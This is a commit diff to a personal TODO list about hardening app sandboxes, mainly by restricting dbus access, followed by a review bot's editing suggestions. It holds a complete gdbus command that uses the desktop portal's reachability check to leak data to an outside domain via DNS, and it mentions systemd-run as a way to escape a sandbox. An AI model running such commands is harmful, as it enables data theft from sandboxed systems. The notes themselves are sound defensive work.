todo.md: add task to lock down dbus
TODO.md
@@ -71,9 +71,11 @@
- sandbox `nix`
- enforce that all `environment.packages` has a sandbox profile (or explicitly opts out)
- lock down dbus calls within the sandbox
- otherwise anyone can `systemd-run --user ...` to potentially escape a sandbox
- <https://github.com/flatpak/xdg-dbus-proxy>
- maybe if i connect everything to the _system_ bus i can gate interactions via polkit?
- stuff on dbus presents too much surface area
- ~~for example anyone can `systemd-run --user ...` to potentially escape a sandbox~~
- for example, xdg-desktop-portal allows anyone to make arbitrary DNS requests
- e.g. `gdbus call --session --timeout 10 --dest org.freedesktop.portal.Desktop --object-path /org/freedesktop/portal/desktop --method org.freedesktop.portal.NetworkMonitor.CanReach 'data1.exfiltrate.uninsane.org' 80`
- make dconf stuff less monolithic
- i.e. per-app dconf profiles for those which need it. possible static config.
- flatpak/spectrum has some stuff to proxy dconf per-app
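Review bot: the struck-through entry "~~for example anyone can `systemd-run --user ...` to potentially escape a sandbox~~" repeats the earlier "otherwise anyone can `systemd-run --user ...` to potentially escape a sandbox" two items above it; if that point was moved under "stuff on dbus presents too much surface area", drop the earlier copy so the systemd-run risk is stated once, next to the xdg-desktop-portal `NetworkMonitor.CanReach` example. The "lock down dbus calls within the sandbox" item could also name the linked `xdg-dbus-proxy` as the candidate mechanism, and the polkit idea should note that it only helps for the _system_ bus, since the `gdbus call --session ...` example shows the exposure is on the session bus.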